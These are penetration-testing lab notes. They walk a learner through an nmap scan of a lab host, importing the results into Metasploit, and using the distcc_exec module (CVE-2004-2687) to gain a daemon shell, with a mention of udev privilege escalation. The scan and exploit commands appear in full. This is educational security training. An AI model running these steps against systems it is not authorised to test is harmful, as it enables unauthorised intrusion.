Lesson 1 Lab Notes
In this lab we will do the following:
- Run a port scan against our victim and perform enumeration on network services by using NMAP.
- Review and save the NMAP scan results for future lessons.
- Import scans into Metasploit Framework.
- Use Metasploit to exploit the distcc daemon.
What is distcc?
distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed.
CVE (Common Vulnerabilities and Exposures) Information:
http://www.cvedetails.com/cve/cve-2004-2687
Exploit CVE 2004-2687; distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Module Information:
Rapid7 shows you what Metasploit module to use https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
And exploit-db, which is bookmarked to your Firefox by default, shows you the code of the module just in case you were curious. https://www.exploit-db.com/exploits/9915/
Instructions:
When you begin with nmap and type in the IP address of your target 172.16.56.2 you will see this:
nmap -T4 -A -v 172.16.56.2
It’s important to know what the switches do.
-T<0-5> example -T4 | Set timing template, the higher the number the faster it is
-A | Enable OS detection, version detection, script scanning and traceroute
-v | Verbose output
While -T4 -A -v will get the job done it will only scan the top 1000 ports and not the entire port range. You will want to scan the entire port range of your target and remember, nearly each service has an exploit. Here my favorite nmap switches that I want to share with you:
-p- | Scan all 65535 ports
-p 80 | Will only scan for port 80
-p 80,443 | Scans for ports 80 and 443
-sS | Scan using TCP SYN scan (default).
-sV | Service detection.
-sC | Scan using default safe scripts must be run with -sV switch in order for the NSE scripts to be effective.
-O | Enable OS detection.
-n | Will not do DNS resolution, this is useful if you are scanning multiple hosts and want to cut down on how
long the scan will run.
-iL <file path> | Will scan from a file, very handy if you want to scan multiple hosts.
--open | Will only show you the open ports on a target, this is useful when you are scanning the entire port
range and don’t care to see which ports are closed or filtered.
--reason | Will show you why the port is in a particular state.
You can find more switches here and a cheat sheet here.
Now let’s run our NMap scan!
nmap -p- -sS -sC -sV --open --reason -v 172.16.56.2
You'll see that the distcc service is running on port 3632 and nearly every service running on our Linux host is exploitable.
It’s running on port 3632. Now save this scan and launch the Metasploit Framework.
I like to use workspaces in Metesploit to keep my targets separated.
workspace
Workspace will show you which workspace or which database you are working in. I've already created a workspace called meta2 by typing in the following command:
workspace -a meta2
After you create a workspace it will move you to it automatically. In my case, I have to switch to it.
workspace meta2
Once the workepace has been created let's import out NMap scan into Metasploit.
db_import /root/hackmd/meta2_2017-03-27.xml
Now that is all said and done let's move onto the actual exploit. The show options command will show the available parameters for the module.
search distcc
use exploit/unix/misc/distcc_exec
show options
RHOST stands for Remote Host and it is required in order for this module to run the exploit.
set RHOST 172.16.56.2
exploit
That's all we had to do to hack our Linux server. We now have shell access and if you type in -
whoami
It will show you that you are running under daemon. From here you can privilege escalate from daemon to root by exploiting the udev process. It is a manual exploit but I've linked a video below that can walk you through it. I ran the udev exploit and if you can find the files I left on the server I will give you crewhu! :)